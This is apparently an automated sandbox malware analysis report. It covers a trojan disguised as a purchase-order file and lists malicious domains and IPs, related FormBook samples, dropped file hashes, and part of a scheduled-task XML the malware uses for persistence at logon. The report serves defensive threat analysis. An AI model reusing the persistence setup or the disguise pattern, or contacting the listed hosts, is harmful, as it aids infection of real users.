                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.thinkphp.cnrunas.exe, 00000012.00000002.2943817151.000000000537A000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.00000000036EA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.jiyu-kobo.co.jp/Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.fontbureau.com/designers8Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            38.6.78.235
                                                                                                            www.17jkgl.comUnited States
                                                                                                            174COGENT-174UStrue
                                                                                                            15.197.142.173
                                                                                                            dojodigitize.shopUnited States
                                                                                                            7430TANDEMUStrue
                                                                                                            194.58.112.174
                                                                                                            www.elinor.clubRussian Federation
                                                                                                            197695AS-REGRUtrue
                                                                                                            154.23.176.197
                                                                                                            www.shipincheshi.todayUnited States
                                                                                                            174COGENT-174UStrue
                                                                                                            139.162.181.76
                                                                                                            www.alvinsd.buzzNetherlands
                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1563935
                                                                                                            Start date and time:2024-11-27 16:41:34 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 10m 10s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:20
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@23/16@5/5
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 83.3%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 92%
                                                                                                            • Number of executed functions: 105
                                                                                                            • Number of non-executed functions: 303
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            • VT rate limit hit for: Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            TimeTypeDescription
                                                                                                            10:42:27API Interceptor2x Sleep call for process: Pre Alert PO TVKJEANSA00967.bat.exe modified
                                                                                                            10:42:35API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                            10:42:39API Interceptor2x Sleep call for process: STiokuWkiGFJ.exe modified
                                                                                                            10:43:40API Interceptor1512247x Sleep call for process: runas.exe modified
                                                                                                            15:42:36Task SchedulerRun new task: STiokuWkiGFJ path: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            15.197.142.173firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 15.197.142.173/
                                                                                                            7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                                            • womanbelieve.net/index.php
                                                                                                            mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                                                            • womanbelieve.net/index.php
                                                                                                            7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                                            • womanbelieve.net/index.php
                                                                                                            mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                                                            • womanbelieve.net/index.php
                                                                                                            vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                            • womanbelieve.net/index.php
                                                                                                            vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                            • womanbelieve.net/index.php
                                                                                                            http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                                                                                            • www.acproyectosdeingenieria.com/
                                                                                                            http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                                                                                            • www.acproyectosdeingenieria.com/
                                                                                                            FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                                            • www.marillyaffewedding.com/de94/
                                                                                                            194.58.112.174CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.sklad-iq.online/gdvz/
                                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.sklad-iq.online/gdvz/
                                                                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                            • www.sklad-iq.online/j4lg/
                                                                                                            PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.marketplacer.top/xprp/
                                                                                                            shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.marketplacer.top/xprp/
                                                                                                            SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.marketplacer.top/xprp/
                                                                                                            BkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.lichnyyrost.online/5xjb/
                                                                                                            NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.lichnyyrost.online/5xjb/
                                                                                                            En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.solutioncode.online/yxqw/
                                                                                                            Quote_General_Tech_LLC_637673,PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.cpamerix.online/gl7x/
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            AS-REGRUDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 37.140.192.206
                                                                                                            Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 31.31.196.177
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 31.31.196.177
                                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 194.58.112.174
                                                                                                            VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 31.31.196.177
                                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 194.58.112.174
                                                                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 31.31.196.17
                                                                                                            HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 31.31.198.145
                                                                                                            Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 194.58.112.173
                                                                                                            F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 195.133.18.88
                                                                                                            COGENT-174USpjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 38.216.7.11
                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 38.189.106.204
                                                                                                            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 38.251.250.69
                                                                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 38.88.81.215
                                                                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 38.225.22.135
                                                                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 38.221.96.77
                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.127.150.181
                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.41.47.100
                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.83.47.2
                                                                                                            https://www.filemail.com/t/YJycry3GGet hashmaliciousUnknownBrowse
                                                                                                            • 50.7.224.146
                                                                                                            TANDEMUSPAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                            • 15.197.148.33
                                                                                                            https://www.gogetsy.com/downloads/eyJmaWxlX2lkIjoiMTIwMDY1NzY3MjE3NSIsInRyYW5zYWN0aW9uX2lkIjoiMzgyNDQ4NTYwOSIsImV2ZW50IjoiZG93bmxvYWQiLCJub25jZSI6IjY3M2NlODI0MTU2ZGQ2NzNjZTgyNDE1NmRmNjczY2U4MjQxNTZlMDY3M2NlODI0MTU2ZTEiLCJ0aW1lc3RhbXAiOjE3MzIwNDQ4MzZ9/0ff3c9f2d9eae28f5e9880589ecb55882049889393d1e096fca15f339c17e418Get hashmaliciousUnknownBrowse
                                                                                                            • 15.197.193.217
                                                                                                            nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 15.243.152.43
                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 15.210.44.128
                                                                                                            https://soloist.ai/proposalrequest-14Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 15.197.167.90
                                                                                                            la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 15.202.12.252
                                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 15.194.171.10
                                                                                                            file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 15.197.142.173
                                                                                                            https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                            • 15.197.143.135
                                                                                                            Delivery_Notification_00000875664.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 15.197.240.20
                                                                                                            No context
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.379460230152629
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugei/ZPUyus:fLHyIFKL3IZ2KRH9Ougss
                                                                                                            MD5:13A0210EC58120EB2CD3445DB5AA3776
                                                                                                            SHA1:3F4A3CC558C2298A0A4A5550005867DA4CE17040
                                                                                                            SHA-256:8668682A9DF285C90FBF4AF490B8569E4261A3934650B51A659A229C80F6F391
                                                                                                            SHA-512:35B241B4A5E13ECF18A6E45A5AD8B34EDCDBBBBF6235A200C1FB346A66626161D96578B361044AD0AFB221502C0D2F1A25633D53B76BAD2DD67BE2F91C91463C
                                                                                                            Malicious:false
                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                            Process:C:\Windows\SysWOW64\runas.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1578
                                                                                                            Entropy (8bit):5.113635396296077
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
                                                                                                            MD5:174DBEDA5B2271DBBE12F71A9CB62DF1
                                                                                                            SHA1:D56C8AF265AB47310804508BE51B3F8D333BBD44
                                                                                                            SHA-256:D989663B3E8C79586FD87B935DBD5831DA3D00A9B3BAFAB47C3FD77702AA2A84
                                                                                                            SHA-512:70CE9245DA8D453F5E77C36AD7DB958FE5F180594E943843EBA9F3DB20C1448D8457E1C539A7C53DFB476AD850C21D75F7FF639CDAFF55033C6BBD634CA300F5
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                            Process:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1578
                                                                                                            Entropy (8bit):5.113635396296077
